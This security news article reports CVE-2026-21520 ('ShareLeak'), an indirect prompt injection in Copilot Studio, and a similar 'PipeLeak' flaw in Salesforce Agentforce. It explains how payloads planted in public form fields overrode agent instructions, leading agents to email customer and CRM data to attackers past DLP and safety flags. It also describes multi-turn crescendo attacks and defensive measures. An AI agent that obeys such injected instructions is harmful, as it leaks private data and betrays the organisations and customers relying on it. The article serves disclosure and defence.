Microsoft recently patched a critical vulnerability in Copilot Studio, but the incident has exposed a deeper, more systemic flaw in how AI agents handle sensitive data. Although the technical hole was plugged, the process revealed that existing safety guardrails—including data loss prevention (DLP) and internal safety flags—failed to stop actual data exfiltration during testing.
The vulnerability, tracked as CVE-2026-21520, is an indirect prompt injection with a CVSS score of 7.5. Discovered by the research team at Capsule Security, the flaw allowed attackers to hijack an agent’s instructions via a public-facing form. Microsoft deployed a patch on January 15, 2026, following a coordinated disclosure process that began in late 2025.
For security professionals, the patch is less significant than the precedent it sets. Assigning a Common Vulnerabilities and Exposures (CVE) identifier to a prompt injection in an agentic platform is highly unusual. It signals that the industry may be moving toward treating “prompt injection” not as a quirk of LLM behavior, but as a formal class of software vulnerability that enterprises must track, and manage.
The mechanics of ShareLeak
Researchers named the specific exploit “ShareLeak.” The attack targets the gap between a SharePoint form submission and the context window of a Copilot Studio agent. In a typical scenario, an attacker fills a public comment field with a carefully crafted payload designed to mimic a system-level instruction.
During testing, Capsule Security found that Copilot Studio concatenated this malicious input directly with the agent’s system instructions without proper sanitization. This allowed the payload to override the agent’s original purpose. In a proof-of-concept attack, the hijacked agent was directed to query connected SharePoint Lists for customer data and then transmit that information via Outlook to an email address controlled by the attacker.
The most concerning aspect of the breach was the failure of secondary defenses. Microsoft’s internal safety mechanisms flagged the request as suspicious, yet the data was exfiltrated anyway. The system’s DLP tools did not trigger due to the fact that the exfiltration occurred through a legitimate Outlook action, which the system viewed as an authorized operation. Here’s a classic “confused deputy” problem: the AI agent has the permission to send emails, and the attacker simply convinced the agent to use that permission for a malicious goal.
The ‘Lethal Trifecta’ and the Salesforce parallel
The vulnerability is not isolated to Microsoft. Capsule Security identified a similar flaw in Salesforce Agentforce, which they dubbed “PipeLeak.” In their testing, a public lead form payload hijacked an Agentforce agent without requiring any authentication, allowing the exfiltration of CRM data with no observed volume cap.
Unlike Microsoft, Salesforce has not assigned a CVE or issued a public advisory for PipeLeak as of the latest research. This discrepancy highlights a growing divide in how AI vendors view agentic risk. While Salesforce previously patched a different vector known as “ForcedLeak” by enforcing Trusted URL allowlists, researchers found that PipeLeak bypassed those controls by using authorized email tool actions.
Naor Paz, CEO of Capsule Security, identifies a “lethal trifecta” of conditions that make any AI agent exploitable: access to private data, exposure to untrusted content, and the ability to communicate externally. Because these three elements are exactly what make agents useful for business, the vulnerability is structural rather than incidental.
Patching vs. Runtime Enforcement
The industry is now debating whether the traditional “patch-and-pray” model is sufficient for AI agents. Elia Zaitsev, CTO of CrowdStrike, argues that the patching mindset itself is a vulnerability, noting that it is nearly impossible to patch every possible prompt injection vector. Instead, Zaitsev advocates for runtime security—monitoring the actual “kinetic” actions an agent takes rather than trying to predict its intent.
This contrasts with the “guardian agent” approach, where fine-tuned small language models (SLMs) evaluate every tool call before it is executed. This layer of intent analysis aims to stop the “confused deputy” scenario by vetting the goal of the action before the agent triggers a tool like Outlook or a CRM export.
The risk is further complicated by “multi-turn crescendo” attacks. In these scenarios, an attacker does not send one large malicious prompt, but distributes the payload across several benign-looking interactions. Because most Web Application Firewalls (WAFs) are stateless—meaning they look at each request in isolation—they fail to notice the semantic trajectory of the attack until the final, malicious action is triggered.
Immediate steps for security leaders
For organizations deploying agentic AI, the window between November 24, 2025, and January 15, 2026, represents a potential period of compromise for those using Copilot Studio agents triggered by SharePoint forms.
| Vulnerability | Primary Risk | Immediate Action |
|---|---|---|
| ShareLeak | Data theft via SharePoint/Outlook | Audit Copilot Studio agents; restrict outbound email to internal domains. |
| PipeLeak | CRM data exfiltration | Review Agentforce automations triggered by public forms; enable human-in-the-loop. |
| Crescendo | Multi-turn prompt injection | Implement stateful monitoring to track conversation history across turns. |
| Coding Agents | Memory poisoning/Code execution | Audit MCP server configurations and restrict code execution permissions. |
Security directors are encouraged to classify every agent deployment based on the “lethal trifecta” exposure. If an agent has access to sensitive data and can communicate with the outside world, it should be treated as a high-risk asset regardless of whether a specific CVE has been issued.
The next critical checkpoint for the industry will be the broader adoption of agentic security frameworks, such as the OWASP Top 10 for Agentic Applications, as companies move from experimental pilots to full-scale production deployments in 2026.
Do you use AI agents in your production environment? Share your thoughts on runtime security in the comments below.
